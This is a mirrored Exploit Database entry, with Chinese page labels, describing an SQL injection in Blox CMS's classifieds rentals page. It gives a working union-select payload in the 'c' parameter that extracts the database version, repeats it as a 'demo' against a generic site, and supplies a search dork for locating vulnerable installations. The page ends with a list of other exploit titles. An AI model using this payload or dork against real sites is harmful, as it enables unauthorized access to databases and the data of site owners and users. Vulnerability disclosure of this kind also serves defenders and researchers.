Blox CMS – SQL Injection

Exploit Database
87 阅读

作者： CoBRa_21

日期： 2010-05-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12729/

-------------------------------------------------------------------------------------------

Blox CMS SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Script Home: http://bloxcms.com/

Dork: Powered by Blox CMS from TownNews.com

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15


Demo :

http://www.site.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15

-------------------------------------------------------------------------------------------

last Exploits
Blox CMS – SQL Injection的更多信息

Meteocontrol WEB’log – Admin Password Disclosure (Metasploit)：
Single Theater Booking Script 3.2.1 – ‘findcity.php?q’ SQL Injection：
Webmin 1.973 – ‘save_user.cgi’ Cross-Site Request Forgery (CSRF)：
WordPress Plugin TheCartPress 1.4.7 – Multiple Vulnerabilities：
Online Clinic Management System 2.2 – Multiple Stored Cross-Site Scripting (XSS)：
PodHawk 1.85 – Arbitrary File Upload：
MyBB User Profile Skype ID Plugin 1.0 – Persistent Cross-Site Scripting：
HP Insight Diagnostics Online Edition 8.4 – ‘custom.php?testmode’ Cross-Site Scripting：